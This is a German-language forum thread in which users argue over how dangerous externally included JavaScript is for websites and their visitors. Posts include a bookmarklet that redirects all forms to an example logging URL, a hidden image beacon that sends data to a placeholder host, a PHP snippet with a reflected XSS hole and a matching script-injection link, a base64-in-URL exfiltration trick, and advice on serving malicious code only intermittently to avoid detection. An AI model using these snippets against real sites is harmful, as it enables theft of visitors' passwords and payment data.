[JavaScript] Sicherheitsrisiko beim Einbinden externer Scriptdateien

[SpecialsGuy]

Tja, da hast du dann Pech gehabt, wenn sich die JS ständig ändert. Tststsss ... manch einer muss seinen Code wohl stündlich umschreiben. Naja, kein Wunder, Programmierer kosten heute ja nix mehr, da kann man es sich leisten

 

[Scar]

die checksumme finde ich eine wirklich tolle idee. man könnte ja einfach ein weiteres attribut einführen (vom w3c). die browser würden diese prüfung dann vor der aktiven einbindung prüfen und evt fehler werfen.

das ganze hat nur einen haken. wer will bzw wie will man einer js-datei verbieten weitere js-datein einzubinden...

 

[theHacker]

das ganze hat nur einen haken. wer will bzw wie will man einer js-datei verbieten weitere js-datein einzubinden...

Da müsste man ansetzen, wenn der Browser die Datei holen soll (aus welchem Grund auch immer). Ein JavaScript hat ja content-type text/javascript. Daran kannst du ein JavaScript erkennen und entsprechend handeln.

Würde dann nur dumm für solche Scripteinbindungen ausgehen, die keinen content-type angegeben haben.

edit:
3.000ster Post

 

[SpecialsGuy]

das ganze hat nur einen haken. wer will bzw wie will man einer js-datei verbieten weitere js-datein einzubinden...

Tja, du siehst, es findet sich irgendwie irgendwo immer ein Weg ... seit jeher ist es immer ein Wettlauf was das Thema Sicherheit angeht.

Die Frage ist: Kann man sich auf "vertrauenswürdige Quellen" verlassen? Falls ja, dann binde nur noch von solchen Seiten was ein. Wenn nicht, dann lass es ganz sein.

Allerdings, spinnt man das Thema weiter, stellt sich für mich dann wiederum die Frage, nutzt die vertrauenswürdige Quelle wiederum nur vertrauenswürdige Quellen und wie sicher ist dessen System, z.B. was wenn ein Hacker diese Quelle manipuliert?

Wenn man z.B. eine sehr weit verbreitete/benutzt Datei einbindet, dann wird es womöglich einigen relativ früh auffallen, wenn damit was nicht stimmt. Wenn man selbst also die Augen aufhält und sich oft in entsprechenden Foren aufhält oder entsprechende Mailinglisten abonniert hat, sollte man auch früh erfahren, daß was faul ist. Wenn das Risiko einem auch dann zu groß ist, lässt man es wiederum sein.

Bei all diesen Fragen darf man auch nicht das Verhältnis zwischen Aufwand und Nutzen aus den Augen verlieren. Auf einer Seite, wo eh nicht viel passieren kann oder keine vertraulichen Daten existieren, wird es kaum Sinn machen einen Heidenaufwand zu betreiben nur um sich vor "bösen" Quellen zu schützen. Andererseits sollte man jedoch ein paar grundlegende No-No (z.B. include('https://...') erlauben) immer vermeiden, denn man darf auch nicht vergessen, daß wenn man eine unwichtige und eine wichtige Seite auf dem gleichen Server betreibt, man eine Lücke von der unwichtigen zur wichtigen Seite öffnen könnte.

Ach ja ... zu solchen Themen könnte man noch soooviel schreiben
Und man neigt schnell dazu es zu verallgemeinern ... mir fällt's schwer auf das eigentliche "externe Javascript-Dateien" mich zu beschränken *g* Wahrscheinlich deswegen, weil man auch nie einen solchen Punkt von einem Sicherheitskonzept absplitten darf und ich bei meinen Projekten dann das entsprechend auch gesamt behandle.

 

[tleilax]

Und man neigt schnell dazu es zu verallgemeinern ... mir fällt's schwer auf das eigentliche "externe Javascript-Dateien" mich zu beschränken *g*

Ich kann den Titel meinetwegen gerne abändern.

 

[MrToiz]

Einfach mal

javascript:(function() {var intercepted = 'https://example.com/log_whole_request';for(i=0;i<document.forms.length;i++){document.forms[i].action=intercepted;}})()

in die Adressleiste eintippen (nur mit firefox getestet, kommt dem ausführen als script gleich) und ein Form absenden

Noch schöner wird es doch erst, wenn die ganze Seite gefälscht wird (document.getElementsByTagName("body")[0].innerHTML = "...";). Hätte klamm z.B. ein JS von mir eingebunden, könnte ich dem gutgläubigen User (in der Adresszeile steht ja noch klamm.de und das Design passt auch) eine nette Meldung präsentieren ("Sie haben bei der Sonderverlosung 100€ gewonnen. Bitte geben Sie ihre Kreditkartendaten ein, um sich das Geld auszahlen zu lassen") und schwupps...

 

[SpecialsGuy]

eine nette Meldung präsentieren ("Sie haben bei der Sonderverlosung 100€ gewonnen. Bitte geben Sie ihre Kreditkartendaten ein, um sich das Geld auszahlen zu lassen") und schwupps...

Und wer glaubst du wäre so dumm ... ?!?!?!
Uups, was sag ich da?

 

[ice-breaker]

hmm, also mozilla hat sich schonmal gedanken über signierte scripts gemcht:
https://www.mozilla.org/projects/security/components/signed-scripts.html

 

[ABC]

Moinsen,

ich wollte mal die Gelegenheit nutzen und eine Diskussion über die Risiken extern eingebundener Javascriptdateien starten.

Ich habe grad beim Rumtüfteln gemerkt, wie vielseitig die Möglichkeiten sind, wenn man erstmal einen Webmaster dazu bringt, eine externe Javascriptdatei auf seinen Seiten einzusetzen. Kaum einer guckt sich doch vermutlich an, was in den Javascriptdateien drin steht, solange alles ordnungsgemäß funktioniert.

Was dabei im Hintergrund passieren kann, ist wahrscheinlich den wenigsten bewusst. Mit ein wenig Wissen und einfachsten Mitteln hab ich mir grad ein Javascript geschrieben, mit dem ich rein theoretisch sämtliche Zugangsdaten der User erhalten könnte, die die Seite besuchen und sich einloggen, solange meine Datei ausgeführt wird. Wie ich das mache, werde ich hier öffentlich nicht posten, da ich mir der Risiken schon bewusst bin.

Meine Frage wäre nun, ob sich jemand anders schonmal Gedanken darum oder Erfahrungen damit gemacht hat? Ich persönlich würde inzwischen keiner externen Seite mehr erlauben, bei mir Javascriptcode auszuführen.

Das ist nur ein Bug, den sich Ebay.de geleistet hat. Du kannst mit einem Javascript rein garnichts tun. Nicht mal eine Cookie auslesen, wenn es nicht für den JS freigegeben ist. Ja und wenn du Formulare oder Request auselsen willst, erklärst du mir mal, wie das bei https gehen soll. Anderweitig bekommst du auch kein Zugriff aud das "password" Feld.

Diese Träumereien, die auf "ja ich möchte gerne" ... "ein Hacker werden" sind schon lange umdiskutiert. Du kanst dein Javascript dem Webmaster nicht unterjubeln. Es sei denn, es ist ein "fang gerade an zu proggen User", und der hat nichts, was du gerbauchen könntest.

Unter XP gibt es noch einen schönes Update für den IE, das dich vorher schön frägt, ob dein Scriptchen etwas absenden darf.

Aber darum geht es garnicht. Welcher blöde Hacker ist wirklich so dumm, und schleicht per JS etwas raus?? - Das ist doch für alle schön nachvollziehbar, und er findet sich schnell im Kanst wieder

Nein mit JS kannste nichts tun. Du kannst auch eine dynamische IP von Özgüru in der Türkei haben, deine Protokolldaten bleiben geloggt. Dein JS sagt wohin mit der Post.

Wer eine Friewall hat, dem kannst du mit einem JS schon rein garnichts antun.

Etwas weniger bekannt ist der Umstand das der Internet Exploder es erlaubt Javascript in CSS Files einzubinden.
Schlussfolgerung? Jedes (externe) CSS kann falls der Benutzer den MS IE verwenden die Client Seite annähernd beliebig Manipulieren.

Du meinst nicht ehrlich, dass ein JS mir am Browser vorgaukeln wird, dass mein Schloss Symbol für SSL aufläuchtet? - Schon mal IE7 probiert? Antiphising schlägt Alarm.

Das alles sind nur Ansätze, wie es tehoretisch machbar wäre, nur was man da auslesen kann mit, kann keinen besonderen Schaden tragen. Mein gut okay, es gibt auch Id**** die per E-Mail eine Nachricht bekommen, und dort ihre Passwörter angeben. Bei denen kommst du auch mit JS weit. Aber kein suaberer Mensch wird nicht darauf achten, was er bei oder mit seinen wichtigen Daten macht.

Wenn du bei uns in der Firma das Cookie ausliest, hast du das MD5 Passwort. Nun bist du drin. Aber wenn du was geschäftliches kaufen willst, darfst das Passwort bestätigen, und zwar im rein Text. Das ganze läuft und wird dann schöne auf einer 128 Bit Verschlüsselung. Da geht JS nach Hause.

Javascript legt nur eine Tarnungsfläche dar. Bit einelsen von daten kann man natürlich Schaden fügen. Dem stelle ich mich überhaupt nicht zwischen. Nur den Schaden, den du damit anrichten tust, der kann nur einer von für dich nicht besonderem Wert sein. Dein Bot ist schneller entdeckt, als du die Daten abholen kannst. Das Risiko verfolgt und erwischt zu werden höchst riskant. Und schliesslich für SSL verschlüsselung garnicht anwendbar, denn dort werden Externe Inhalte blockiert, die nicht selbst von den SSL Ports kommen. Und somit das ablegen des Requests garnicht möglich. Das lesen hingegen schon.

 

[tleilax]

Ja und wenn du Formulare oder Request auselsen willst, erklärst du mir mal, wie das bei https gehen soll. Anderweitig bekommst du auch kein Zugriff aud das "password" Feld.

Ich habe ja primär nicht an a) erfahrene User und somit auch nicht an b) https gedacht. Und Zugriff auf das Passwortfeld kriege ich (zumindest im FF) problemlos.

Du kanst dein Javascript dem Webmaster nicht unterjubeln. Es sei denn, es ist ein "fang gerade an zu proggen User", und der hat nichts, was du gerbauchen könntest.

Nunja, rein theoretisch mal angenommen, ich hätte ein Werbenetzwerk und würde den Usern anbieten, per externem JS ein Random-Popup/Banner/Layer/whatever einzubinden. Du bist wirklich der Ansicht, dass mehr als 5% merken würden, dass da was nicht geplantes im Hintergrund passiert?

Aber darum geht es garnicht. Welcher blöde Hacker ist wirklich so dumm, und schleicht per JS etwas raus?? - Das ist doch für alle schön nachvollziehbar, und er findet sich schnell im Kanst wieder

Man kann es ja locker weniger nachvollziehbar machen. Ohne übergebenen Referer (also allem Anschein nach bei Direktaufruf) wird das normale Script rausgehauen und sonst auch nur bei jedem x. Aufruf das schädliche Script. Somit sinken die Chancen, entdeckt zu werden, garantiert wieder um einen nicht unerheblichen Faktor.

Wer eine Friewall hat, dem kannst du mit einem JS schon rein garnichts antun.

Nein?

var frame = document.createElement("iframe");
frame.style.display = "none";
var img = document.createElement("img");
img.src = "https://www.example.org/noharm.jpg?beispiel=daten";
frame.appendChild( img );

document.getElementsByTagName("body")[0].appendChild( frame );

Wieso sollte die Firewall dabei anspringen? Dann müsste sie ja auch bei jedem geladenen Bild meckern...

 

[ZeroCCC]

...

Das ist nur ein Bug, den sich Ebay.de geleistet hat. Du kannst mit einem Javascript rein garnichts tun. Nicht mal eine Cookie auslesen, wenn es nicht für den JS freigegeben ist.

du musst nur das javascript in context der seite ausführen und schon kannst du machen was du willst und das war bei ebay ja kein problem, du konntest doch alles in die produkt beschreibung einfügen. und dann kannst du machen was du willst...

Ja und wenn du Formulare oder Request auselsen willst, erklärst du mir mal, wie das bei https gehen soll. Anderweitig bekommst du auch kein Zugriff aud das "password" Feld.

man bindet ein javascript in context der seite ein und fängt die entsprechenden events ab... also das absenden des formulars. dann tut man die formular daten irgendwo anders hinschicken (zb durch ein bild,iframe,weiteres script oder oder doer) und schickt am ende das orginal formular ab. https schützt dich da überhaput nicht... das einzige auffälige ist, das wenn du das script extern einbindest also mittels <script src="https://example.com/meinscript.js"></script> das die verbindung nicht als sicher angezeigt wird im browser.

Diese Träumereien, die auf "ja ich möchte gerne" ... "ein Hacker werden" sind schon lange umdiskutiert. Du kanst dein Javascript dem Webmaster nicht unterjubeln. Es sei denn, es ist ein "fang gerade an zu proggen User", und der hat nichts, was du gerbauchen könntest.

solche sicherheitslücken bauen unter umständen auch erfahrene programmierer ein. es reicht schon einmal irgend ne stelle wo unescapte daten ausgegeben werden die der user angegeben hat... bsp:

switch($_GET['seite']) {
  case 'main':
     echo 'haupt seite';
     break;
  default:
      echo $_GET['seite'].' nicht gefunden';
}

jetzt könnte nen potenzieler angreifer ein solchen link in umlauf bringen

https://example.de/index.php?seite=<script src="https://externerhost.de/bösesscript.js"></script>

und schon hat der angreifer sein javascript in den context der anderen seite gebracht. (bei usern die über diesen link gehen) natürlich noch einfacher wirds wenn man solche sachen direkt auf der seite hinterlegen kann... zb unescaptes kommentar feld. somit brauch man nichtmal links verteilen.

Unter XP gibt es noch einen schönes Update für den IE, das dich vorher schön frägt, ob dein Scriptchen etwas absenden darf.

das hilft dir recht wenig... bildchen, iframes, scripte usw... ist alles kein absenden, sondern nur ein laden.

Aber darum geht es garnicht. Welcher blöde Hacker ist wirklich so dumm, und schleicht per JS etwas raus?? - Das ist doch für alle schön nachvollziehbar, und er findet sich schnell im Kanst wieder.

Nein mit JS kannste nichts tun. Du kannst auch eine dynamische IP von Özgüru in der Türkei haben, deine Protokolldaten bleiben geloggt. Dein JS sagt wohin mit der Post.

phishing ist auch nachvollziehbar und weiter? ich glaub die leute die sowas machen haben ein wenig mehr ahnung als du und lassen sich nicht so einfach erwischen... da gibts zisch wege um unerkannt zu bleiben.

Wer eine Friewall hat, dem kannst du mit einem JS schon rein garnichts antun.

neh überhaupt nicht

Das alles sind nur Ansätze, wie es tehoretisch machbar wäre, nur was man da auslesen kann mit, kann keinen besonderen Schaden tragen. Mein gut okay, es gibt auch Id**** die per E-Mail eine Nachricht bekommen, und dort ihre Passwörter angeben. Bei denen kommst du auch mit JS weit. Aber kein suaberer Mensch wird nicht darauf achten, was er bei oder mit seinen wichtigen Daten macht.

ich garantier dir du bist auch so einer der auf sowas reinfallen würde wenns gut gemacht ist, jeder würde drauf reinfallen. zb was ist wenn der banneranbieter von klamm nen bösen js code einbindet, der deine persönlichen daten ausliest, was mit js ne raltiv einfach sache ist. das würde kein schwein mitbekommen... weil sich keiner vorher die quelltexte vonner seite ansehen tut. oder was wäre wenn das banner in irgend nen online shop eingebunden ist und der kunde gibt seine kreditkarten daten ein?

Wenn du bei uns in der Firma das Cookie ausliest, hast du das MD5 Passwort. Nun bist du drin. Aber wenn du was geschäftliches kaufen willst, darfst das Passwort bestätigen, und zwar im rein Text. Das ganze läuft und wird dann schöne auf einer 128 Bit Verschlüsselung. Da geht JS nach Hause.

wenn ich an den md5 hash komme, dann komm ich auch an das klartext passwort... ne sicherhheitslücke ist da, also muss man sich bloss ein wenig klüger anstellen.

Javascript legt nur eine Tarnungsfläche dar. Bit einelsen von daten kann man natürlich Schaden fügen. Dem stelle ich mich überhaupt nicht zwischen. Nur den Schaden, den du damit anrichten tust, der kann nur einer von für dich nicht besonderem Wert sein. Dein Bot ist schneller entdeckt, als du die Daten abholen kannst. Das Risiko verfolgt und erwischt zu werden höchst riskant. Und schliesslich für SSL verschlüsselung garnicht anwendbar, denn dort werden Externe Inhalte blockiert, die nicht selbst von den SSL Ports kommen. Und somit das ablegen des Requests garnicht möglich. Das lesen hingegen schon.

mit javascript kann man mehr schaden anrichten als dir klar ist... es gibt überall seiten wo es sich für manche leute lohnen würde dort mit kriminelerenergie geld zu machen. und https bietet dir auch nicht wirklich viel mehr schutz... es ist bloss auffälliger.

 

[ABC]

Ich habe ja primär nicht an a) erfahrene User und somit auch nicht an b) https gedacht. Und Zugriff auf das Passwortfeld kriege ich (zumindest im FF) problemlos.

Ja okay ist klar.

Nunja, rein theoretisch mal angenommen, ich hätte ein Werbenetzwerk und würde den Usern anbieten, per externem JS ein Random-Popup/Banner/Layer/whatever einzubinden. Du bist wirklich der Ansicht, dass mehr als 5% merken würden, dass da was nicht geplantes im Hintergrund passiert?

Wenn du einen Werbnetzwerk hast, bist du auch für dessen Verlinkung verantwortlich, also bringt dir die Ausrede "kann nichts für" garnichts. Selbiges Problem wurde bereits bei SWF Filmen behoben. Das wesentlich entscheidende ist ja, dass du keine "password" Formular Daten abschleppen kannst. Gut wenn das beim FIFO geht, was ich bislang nicht wusste, dann würde ich den Browser bis zum Patch garnicht erst nutzen.

Die Theorie ist mir klar. Aber selbst Outlook warnt, wenn Bilder oder Javascripts per Get Parameter Javascript abrufen. Da kommt dann die Meldung, dass die E-Mail externe dynamische Abrufe beinhaltet. Grund wa ja, dass man früher E-Mails blind suchte. Über ein Bild, wurde dann ausgelesen, ob die E-Mail tatsächlich existiert. Das ist also schon ein Steinzeitporblem.

Jede Anti Spam (auch Kasperski Antispam) Schlägt dir so ein Alarm, bei diesem Verfahren, sodass du sofort auffliegst. Das ist wirklich so. Problem ist, die meisten haben keine AntiSpm Software.

Zudem mal das ganze mit IE7 probieren. Da bekommst so eine Seite garnicht mal zu Gesicht. Den IE7 Hat ein Antiphishing Schutz.

du musst nur das javascript in context der seite ausführen und schon kannst du machen was du willst und das war bei ebay ja kein problem, du konntest doch alles in die produkt beschreibung einfügen. und dann kannst du machen was du willst...

Das ist wieder nur eine Theorie. Der JS muss in den header! Im Body kannst du nach Hause gehen.

switch($_GET['seite']) {
case 'main':
echo 'haupt seite';
break;
default:
echo $_GET['seite'].' nicht gefunden';
}

Da muss ich dir an Stelle recht geben!

phishing ist auch nachvollziehbar und weiter? ich glaub die leute die sowas machen haben ein wenig mehr ahnung als du und lassen sich nicht so einfach erwischen... da gibts zisch wege um unerkannt zu bleiben.

Na übernimm dich bitte! Als ich das Hacken aufgegeben habe, hatte ich bei der Commerzbank Konten geplündert. Mit dem Urteil was ich dir per PN übermitteln kann, habe ich gelernt aufzuhören und auszusteigen! Wenn du das erstmal hinbekommst, dann kannst du mir sagen, dass ich kein Plan hab.

Selbst bei denen habe ich die Daten ausspioniert, nur eben sind die schön protokolliert worden. Fazit 2 Jahre 6 Monate auf Bewährung. Und diese leifen über 4 Bots.

Es ist garnicht möglich was hier angepriesen wird, ohne das dass Risiko über hoch ist, erwischt zu werden. Sowas habe ich schon 2001 getrieben. Das ist Schnee von vor ein paar Jahren. Und auch Ebay hat mit den (Exteren( Shops sich einen Bug eingehandelt. Dort hat man Cookies ausspioniert. Es bringt einfach rein garnichts.

Bei Ebay hat man Beispielweise alle Täter gefasst. Grund die Auktionen blieben gespeichert, und man brauchte nur noch die Codes durchsuchen. Dort hat man die sogar Reihenweise beim Verkauf von nicht existierenden Daten erwischt. Der was sowas macht, hat von "hacken" und "nicht erwischt werden" kein Plan. So ist es nunmal. Ich meinene man kann auch ohne Maske eine Bank überfallen. Das geht auch.

1:

switch($_GET['seite']) {
case 'main':
echo 'haupt seite';
break;
default:
echo $_GET['seite'].' nicht gefunden';
}

Was willst denn bei diesem Code interessantes auslesen? Etwa dein eigenes Passwort? Der Javascript wird doch nur bei dir ausgeführt. Plan muss man schon haben.

 

[tleilax]

Das wesentlich entscheidende ist ja, dass du keine "password" Formular Daten abschleppen kannst. Gut wenn das beim FIFO geht, was ich bislang nicht wusste, dann würde ich den Browser bis zum Patch garnicht erst nutzen.

Ich würde in Zukunft mal meine Behauptungen überprüfen, wenn Du schon zum zweiten Mal damit argumentierst. Ich hab's grad ausprobiert. Im IE (selbst auf höchster Sicherheitsstufe), im Firefox und im Opera ist es problemlos möglich, das Passwort aus einem input[type="password"] per Javascript auszulesen.

<html>
<head>
  <script type="text/javascript">
  function checkPwd() {
    var form = document.getElementsByTagName("form")[0];
    var inputs = form.getElementsByTagName("input");
    for (var i = 0; i < inputs.length; i++) {
      if (inputs[i].type != "password") {
        continue;
      }
      alert(inputs[i].value);
    }
  }
  </script>
  <title>Foo</title>
</head>
<body>
  <form action="" method="post" onsubmit="checkPwd();">
    <fieldset>
      <legend>Test</legend>
      <label for="nickname">Nickname:</label><br/>
      <input type="text" id="nickname" name="nickname" value=""/><br/>
      <label for="password">Passwort:</label><br/>
      <input type="password" id="password" name="password" value=""/><br/>
      <input type="submit" name="submit" value="Abschicken"/>
    </fieldset>
  </form>
</body>
</html>

Ausserdem finde ich, dass Deine Argumentation hinkt. Zum einen argumentierst Du mit IE und Outlook, um dann auf der anderen Seite mit Antispamsoftware wie Kaperski zu kontern. Das sind aus Usersicht zwei vollkommen verschiedene Welten.

Und um auf Deinen Edit zu kommen:

Du kannst JS überall ausführen. Du hast recht, es sollte in den Header, aber AFAIK verzeiht Dir jeder Browser, wenn es anders steht und führt es dennoch aus.

 

[MrToiz]

Wenn du einen Werbnetzwerk hast, bist du auch für dessen Verlinkung verantwortlich, also bringt dir die Ausrede "kann nichts für" garnichts. Selbiges Problem wurde bereits bei SWF Filmen behoben. Das wesentlich entscheidende ist ja, dass du keine "password" Formular Daten abschleppen kannst. Gut wenn das beim FIFO geht, was ich bislang nicht wusste, dann würde ich den Browser bis zum Patch garnicht erst nutzen.

It's not a bug, it's a feature! Und der IE bietet das auch, denn wie sonst sollte sich denn sonst ein JS-"Passwortschutz" realisieren lassen, wenn man mit JS nicht an den Inhalt des Passwortfeldes käme?

Die Theorie ist mir klar. Aber selbst Outlook warnt, wenn Bilder oder Javascripts per Get Parameter Javascript abrufen. Da kommt dann die Meldung, dass die E-Mail externe dynamische Abrufe beinhaltet. Grund wa ja, dass man früher E-Mails blind suchte. Über ein Bild, wurde dann ausgelesen, ob die E-Mail tatsächlich existiert. Das ist also schon ein Steinzeitporblem.

Man muss ja nicht unbedingt GET-Parameter verwenden, du kannst z.B. alle Daten base64-codieren und dann https://example.com/RGFzIHNpbmQgZGllIERhdGVu/bild.gif aufrufen (hier ist der String "Das sind die Daten" codiert). Klar lassen sich auch externe Bilder blocken, aber wenn es wie oben gesagt um ein Werbenetzwerk geht wird das wohl nicht der Fall sein.

Zudem mal das ganze mit IE7 probieren. Da bekommst so eine Seite garnicht mal zu Gesicht. Den IE7 Hat ein Antiphishing Schutz.

Ob der schon bei einem so harmlos aussehenden Bild Alarm schlägt?

Das ist wieder nur eine Theorie. Der JS muss in den header! Im Body kannst du nach Hause gehen.

Hier liegst du leider Falsch Selfhtml


Gruß,
Xgame

 

[LasMiranda]

ein Glück, dass "die" das sogar gezeigt hatten, dass man das PW und Username "auslesen" kann bei Ebay.

Damals konnte noch jeder JavaScript in die Auktionsbeschreibung knallen, heute nur noch Leute mit 100 und mehr Bewertungen (was das Problem trotzdem nicht behebt, aber gut ^^)

Es wurde die oder ein Button so verändert, dass bei OnClick auf eine andere Seite weiterleitet wurde, dann Username und PW-Abfrage und dann wieder Rückleitung an Auktion - zur Sicherheit müsste dann Username und PW übergeben werden, so dass der sich nicht nochmal einloggen muss oder es wurde ne Meldung angezeigt: Fehler aufgetreten, nochmal bitte; das weiß ich nicht.

Auf jeden Fall ging es und wird heute sicherlich auch noch gehen.

Und der Witz mit der Firewall, war ja wohl der Witz des Jahrhunderts. Fast noch besser als der, dass in ein Flash ein fester Pfad reingeschrieben wird, um zu verhindern, dass man Flashspiele nicht von einer fremden Domain spielen kann

...Als ich das Hacken aufgegeben habe...

ich glaube, du hast Null Plan, was "Hacken" überhaupt bedeutet.

 

[burnred]

[...]Das wesentlich entscheidende ist ja, dass du keine "password" Formular Daten abschleppen kannst. Gut wenn das beim FIFO geht, was ich bislang nicht wusste, dann würde ich den Browser bis zum Patch garnicht erst nutzen.

das würde heißen man kann im IE folgenden Code nicht ausführen??

 alert(document.getElementById('passwortfeld').value);

komisch dann frage ich mich wie die Leute in so manschem Scrtipt erkennen das das Passwortfeld leer bzw. der Eintrag zu kurz oder nicht übereinstimmend mit der Bestätigung ist.

 

[Scar]

noch nen kleiner hinweis..

wenn man externe inhalte auf eine https seite einbindet, kommt auch nur dann eine meldung. wenn die externe seite nicht ebenfalls eine https seite ist..

@ password field..
ein passwort feld hat so wie jeder andere input-tag auch sein value, lediglich die optische darstellung ist eine andere.

@ beispiel
im übriegen beweisen die neuen bekannenten ajax-frameworks wie einfach man ganze seiten mit extrem wenigen html-tags aufbauen kann. eben weil der "gesamte" html-code manipuliert wird.


mit hacken hat das übrigens auch net viel zu tun, das is einfaches ausschnüffeln... auch bekannt unter "password-sniffer"

 

[ABC]

Ja gut dann sellte mal eine Seite ins Netz und gibt mir mein Passwort?

Ne wirklich Sory, aber das nehme ich als Witz auf

Ich will hier keinen provozieren oder der gleichen. Wenn ihr bei mir einen JS einjubelt, was könnt ihr den auslesen, ausser das was schon per Request bei euch angekommen ist?

Wer sich das liogisch anschut:

switch($_GET['seite']) { 
  case 'main': 
     echo 'haupt seite'; 
     break; 
  default: 
      echo $_GET['seite'].' nicht gefunden'; 
}

Der braucht doch nicht lange zu überlegen. Was gibt es hier für ein Problem? Ich kann doch hier nur den JS mir selbst unterjubeln.


Ein Blick ins Protokoll gibt dem Webmaster noch die schöne Get Abfrage. Sory damit kann man nur Kindergarten ausspionieren.

 

[MrToiz]

Ich will hier keinen provozieren oder der gleichen. Wenn ihr bei mir einen JS einjubelt, was könnt ihr den auslesen, ausser das was schon per Request bei euch angekommen ist?

Wir können das, was du auf der fremden Seite eingibst (Passwörter, Kreditkartendetails, etc.), auslesen und uns zukommen lassen.

Wer sich das liogisch anschut:

switch($_GET['seite']) { 
  case 'main': 
     echo 'haupt seite'; 
     break; 
  default: 
      echo $_GET['seite'].' nicht gefunden'; 
}

Der braucht doch nicht lange zu überlegen. Was gibt es hier für ein Problem? Ich kann doch hier nur den JS mir selbst unterjubeln.

Du kannst aber den "gefakten" Link verbreiten, so dass auch andere dein JS "untergejubelt" bekommen. Auswirkungen siehe oben.
Außerdem reden wir davon, dass der Webmaster das JS selbst einbaut, wie es bei zahlreichen Freeservices und Werbeanbietern der Fall ist. Dieses JS wird dann nachträglich vom "bösen" Freeservice-Betreiber geändert, so dass es alle Daten abfängt.

Ein Blick ins Protokoll gibt dem Webmaster noch die schöne Get Abfrage. Sory damit kann man nur Kindergarten ausspionieren.

Ja und, der Webmaster kann ruhig wissen, dass mein "böses" Javascript auf irgendeinem Freespace liegt, an mich kommt er dadurch jedoch nicht ran.

 

[ABC]

Wir können das, was du auf der fremden Seite eingibst (Passwörter, Kreditkartendetails, etc.), auslesen und uns zukommen lassen.


Du kannst aber den "gefakten" Link verbreiten, so dass auch andere dein JS "untergejubelt" bekommen. Auswirkungen siehe oben.
Außerdem reden wir davon, dass der Webmaster das JS selbst einbaut, wie es bei zahlreichen Freeservices und Werbeanbietern der Fall ist. Dieses JS wird dann nachträglich vom "bösen" Freeservice-Betreiber geändert, so dass es alle Daten abfängt.


Ja und, der Webmaster kann ruhig wissen, dass mein "böses" Javascript auf irgendeinem Freespace liegt, an mich kommt er dadurch jedoch nicht ran.

Sory hast echt kein Plan. Und das Ufo holt dir die Daten vom FreeSpace. Schöne Theorie. Weist du was ein Bot ist. Das ist erst dann ein Bot, wenn du das Serverprotokoll vernichtgen kannst. Mach das mall mit deinem tollen Javascript.

Man echt, ich sags dir nur nochmal. Ich habe auch 4 Möchtegern Bots gehabt, und man hat mich zurückverfolgen können. Da kannst du 95 Freespaces nehmen.

Meinst du ehlrich, so eine Bank, Paypal oder sonst wer gibt auf nur weil du auf einen Freespace warst, oder in einem Internetcaffe? Niemals! Du wirst zurückverfolgt, in dem Moment, wo du deine Daten abholst. So wars bei mir auch. Ich war im Internetcaffe. Bis ich in einem anderen Die Daten abholen wollte, waren die Handschellen dran. Meinst du so einen Bank lässt einen Schaden auf sich sittzen.

Deshlab nochmal. Du kannst nur Kindergarten damit auslesen. Du hast bestimmt noch weniger Ahnung wie alle zusammen, was bei solchen Unternehmen alles geloggt wird. Du vergisst eins. Hacken bedeutet nicht erwischt werden. Die Brechstanden kann jeder nehmen!!

Das was hier aber betrieben wird, das ist ein Banküberfall ohne Maske! Ich wollte hier niemanden in den Rücken fallen. Aber mit der "Ach so toll mir JS Hack ich die Welt" Geschichte, kann ich mit jahrer langer Erfahrung nur lachen.

Ich werte meine Protokolldaten jeden Tag aus. Wenn du bei mir so ein scheiss abziehst, habe ich dich schenller angezeigt, als du überhaupt die Daten auswerten kannst. Das ist das Problem. Mit dem JS überführst du dich selbst.